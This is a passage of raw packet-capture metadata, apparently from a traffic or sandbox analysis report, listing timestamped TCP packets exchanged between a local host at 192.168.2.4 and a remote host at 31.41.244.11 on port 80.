Dec 14, 2024 12:56:42.742877960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.742918968 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.744642973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.744765043 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.744802952 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.744950056 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.746594906 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.746659040 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.746682882 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.746742964 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.748449087 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.748522043 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.748603106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.748661995 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.750335932 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.750458956 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.750550032 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.752284050 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.752439022 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.752513885 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.754314899 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.754399061 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.754472971 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.756228924 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.756350040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.756465912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.758236885 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.758318901 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.758347988 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.758388042 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.760097027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.760221004 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.760397911 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.761223078 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.761925936 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.762006044 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.762064934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.762257099 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.763770103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.763883114 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.763900995 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.763966084 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.765826941 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.765876055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.765949965 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.766113997 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.768018007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.768121004 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.768140078 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.768285036 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.770138025 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.770205975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.770296097 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.770405054 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.772064924 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.772172928 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.772223949 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.772223949 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.773768902 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.773842096 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.773890018 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.773890018 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.775341988 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.775429964 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.775566101 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.775712967 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.777165890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.777219057 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.777335882 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.777398109 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.779016018 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.779076099 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.779160976 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.780812025 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.780848026 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.780935049 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.781008959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.782691956 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.782747030 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.782787085 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.782843113 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.784729958 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.784809113 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.784950972 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.784950972 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.786674976 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.786756039 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.786772013 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.786803961 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.788420916 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.788507938 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.788537979 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.788623095 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.881519079 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.881553888 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.881628990 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.881685019 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.881742954 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.881762981 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.881818056 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.883114100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.883163929 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.883286953 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.883447886 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.884604931 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.884643078 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.884675980 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.884740114 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.886113882 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.886300087 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.886635065 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.887834072 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.888058901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.888137102 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.889051914 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.889120102 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.889204025 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.889266968 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.890343904 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.890419960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.890464067 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.890464067 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.891592979 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.891693115 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.891726017 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.891751051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.892985106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.893034935 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.893040895 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.893265963 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.894443035 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.894524097 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.894551992 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.894627094 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.895664930 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.895716906 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.895775080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.896011114 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.897007942 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.897098064 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.897121906 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.897217035 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.898325920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.898376942 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.898443937 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.898801088 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.899693012 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.899782896 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.899816036 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.899863958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.900916100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.901000023 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.901036024 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.901194096 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.902189016 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.902241945 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.902302027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.902513027 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.903484106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.903544903 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.903589964 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.903589964 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.904810905 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.904886961 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.904922009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.904974937 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.906042099 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.906126022 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.906167030 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.906167030 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.907480955 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.907560110 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.907603025 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.907603025 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.908600092 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.908680916 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.908704996 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.908961058 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.909758091 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.909812927 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.909878016 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.909934044 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.910969019 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.911020994 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.911089897 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.911297083 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.912190914 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.912326097 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.912369967 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.912369967 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.913400888 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.913520098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.913585901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.913732052 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.914652109 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.914710045 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.914742947 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.914808989 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.915832043 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.915973902 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.916018009 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.916018009 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.917156935 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.917258024 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.917288065 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.917304039 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.918289900 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.918363094 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.918386936 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.918447971 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.919477940 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.919523954 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.919565916 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.919631958 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.920697927 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.920770884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.920797110 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.921185970 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.921890020 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.922014952 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.922128916 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.923094034 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.923194885 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.923264980 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.924355030 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.924413919 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.924427032 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.924465895 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.925539017 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.925621033 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.925653934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.925693035 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.926824093 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.926882982 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.926913023 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.927086115 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.927983046 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.928034067 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.928160906 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.928339005 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.929184914 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.929233074 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.929270029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.929270029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.930402040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.930500031 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.930685043 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.930737019 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.931611061 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.931735992 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.931756973 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.931850910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.932843924 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.932868958 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.932905912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.932905912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.934024096 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.934106112 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.934139967 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.934187889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.935378075 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.935540915 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.935574055 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.935628891 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.936511040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.936578989 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.936630964 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.936841965 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.937792063 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.937846899 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.937978029 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.938081026 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.938919067 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.939016104 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.939040899 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.939115047 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.940104008 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.940155983 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.940227032 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.940310001 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.941395998 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.941509962 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.941529036 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.941564083 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.942580938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.942627907 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.942696095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.942797899 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.943759918 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.943819046 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.943881035 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.944169998 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.944976091 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.945069075 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.945092916 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.945168972 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.946161032 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.946239948 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.946300030 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.946598053 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.947381973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.947482109 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.078413010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.078440905 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.078480959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.078480959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.078629971 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.078732967 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.078744888 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.078795910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.079564095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.079658985 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.079670906 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.079731941 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.080591917 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.080682039 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.080694914 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.080771923 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.081630945 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.081707954 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.081768990 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.081993103 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.082690001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.082739115 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.082763910 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.082848072 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.083828926 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.083882093 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.083949089 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.084070921 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.084855080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.084917068 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.084943056 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.084991932 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.085834026 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.085936069 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.085964918 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.086040020 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.086873055 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.086890936 CET	80	49860	31.41.244.11	192.168.2.4
